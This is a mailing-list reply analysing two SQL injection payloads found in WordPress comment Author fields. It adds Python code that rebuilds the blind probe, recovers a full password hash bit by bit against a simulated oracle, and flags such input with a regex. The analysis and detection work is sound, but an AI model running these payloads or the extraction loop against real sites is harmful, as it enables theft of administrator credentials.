[Gllug] What wordpress vuln / tool is this?

Progga proggaprogga at gmail.com
Sat Mar 8 22:24:58 UTC 2008


On Sat, Mar 08, 2008 at 09:06:23PM +0000, Richard Jones wrote:
> Somebody attempted to post two comments in quick succession to a
> Wordpress blog I manage.  These were the 'Author' fields which caught
> my eye.  Does anyone know what vulnerability they are attempting to
> exploit and/or if they are using some particular tool?  (The IP
> addresses are bogus - it's behind a proxy).
> 
> Author : Bill42046771','766028332billy at msn.com','','84.56.135.100','2008-03-08 14:50:45','2008-03-08 14:50:45','','0','lynx','comment','0','0'),('0', '', '', '', '', '2008-03-09 14:50:45', '2008-03-09 14:50:45', '', 'spam', '', 'comment', '0','0' ) /* (IP: 10.0.0.135 , 10.0.0.135)
> 
> Author : ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,19,1), 16, 2),4,'0')),3,1)='1' /* (IP: 10.0.0.135 , 10.0.0.135)

You mean the issue number of the SQL injection hole that Bill is trying to
exploit?

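As an added illustration (not code from this thread, from WordPress, or from whatever tool posted the comments): the second quoted Author field does not inject anything into the page, it reads one bit of one hexadecimal digit of the stored password hash of `user_login='admin'`, and the server's yes/no reaction is the only output. The Python below re-implements the MySQL string functions in that expression, rebuilds the observed payload from a (hex position, bit) pair to confirm the reading, and shows how 128 such true/false probes (4 bits for each of 32 hex characters) would recover a whole hash. Everything beyond the quoted payload is constructed for the example: the sample hash is a dummy MD5 hex digest (the 32-character format the payload's 4-bit arithmetic implies), `CountingOracle` stands in for the target server, and the marker regex is a simple triage heuristic, not a signature from any product.

```python
"""
Added example: what the quoted blind-injection probe reads, simulated locally.

Observed MySQL expression (copied from the thread):
  substring(reverse(lpad(conv(substring(user_pass,19,1), 16, 2),4,'0')),3,1)='1'
"""
import hashlib
import re
from typing import Callable

# Payload copied verbatim from the quoted message.
OBSERVED_PROBE = (
    "' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and "
    "substring(reverse(lpad(conv(substring(user_pass,19,1), 16, 2),4,'0')),3,1)='1' /*"
)

# Constructed fixture (assumption): an unsalted 32-hex-character MD5 digest,
# the format the payload's per-character / 4-bit arithmetic is built for.
# Dummy value for the example, not a real credential.
SAMPLE_USER_PASS = hashlib.md5(b"password").hexdigest()


def mysql_nibble_bit(user_pass: str, pos: int, idx: int) -> bool:
    """Evaluate the probe expression with MySQL semantics.

    pos: 1-based index into user_pass, as in SUBSTRING(user_pass, pos, 1).
    idx: 1-based index into the *reversed* 4-bit string, so idx=1 tests the
         least-significant bit of the hex digit and idx=4 the most-significant.
    """
    hex_digit = user_pass[pos - 1:pos]          # substring(user_pass,pos,1)
    if not hex_digit:                            # past the end: '' -> conv() gives 0 -> '0'
        return False
    binary = format(int(hex_digit, 16), "b")     # conv(x,16,2): binary, no leading zeros
    padded = binary.rjust(4, "0")                # lpad(...,4,'0')
    reversed_bits = padded[::-1]                 # reverse(...)
    return reversed_bits[idx - 1] == "1"         # substring(...,idx,1)='1'


def build_probe(pos: int, idx: int, login: str = "admin") -> str:
    """Rebuild the Author-field payload for one (hex position, bit) pair."""
    prefix = "' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='"
    expr = (f"substring(reverse(lpad(conv(substring(user_pass,{pos},1), 16, 2),"
            f"4,'0')),{idx},1)='1' /*")
    return f"{prefix}{login}' and {expr}"


class CountingOracle:
    """Hypothetical stand-in for the target: answers one probe with True/False
    (accepted vs. rejected comment, or a visible difference in the response)
    and counts how many submissions that costs the attacker."""

    def __init__(self, user_pass: str) -> None:
        self.user_pass = user_pass
        self.queries = 0

    def __call__(self, pos: int, idx: int) -> bool:
        self.queries += 1
        return mysql_nibble_bit(self.user_pass, pos, idx)


def recover_hash(oracle: Callable[[int, int], bool], length: int = 32) -> str:
    """Reconstruct every hex digit of the hash from four boolean probes each."""
    digits = []
    for pos in range(1, length + 1):
        value = 0
        for idx in range(1, 5):
            if oracle(pos, idx):
                value |= 1 << (idx - 1)   # idx=1 is the LSB after reverse()
        digits.append(format(value, "x"))
    return "".join(digits)


# Constructed triage heuristic: tokens present in the two quoted Author fields
# (UNION probe, wp_users / user_pass, conv(), a spliced-in second VALUES tuple,
# the trailing comment opener) that do not occur in a normal author name.
_SQLI_MARKERS = re.compile(
    r"union\s+select|wp_users|user_pass|\bconv\(|'\s*\)\s*,\s*\(|/\*",
    re.IGNORECASE,
)


def looks_like_sqli(author: str) -> bool:
    """Cheap first-pass check for comment Author fields in a moderation queue or log."""
    return _SQLI_MARKERS.search(author) is not None
```

Two things fall out of running it: `build_probe(19, 3)` reproduces the quoted line character for character, which confirms the reading of position 19, bit 3; and `recover_hash` needs exactly 128 oracle calls for a 32-character hash, so the two comments Richard saw are a pair of probes from a longer automated run rather than a one-shot exploit. The first quoted field, which closes the author value and appends a second `VALUES` tuple with `comment_approved='spam'`, is the same injection point being exercised in INSERT form; the `'),(` splice is what the regex keys on for it.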
-- 
Gllug mailing list  -  Gllug at gllug.org.uk
http://lists.gllug.org.uk/mailman/listinfo/gllug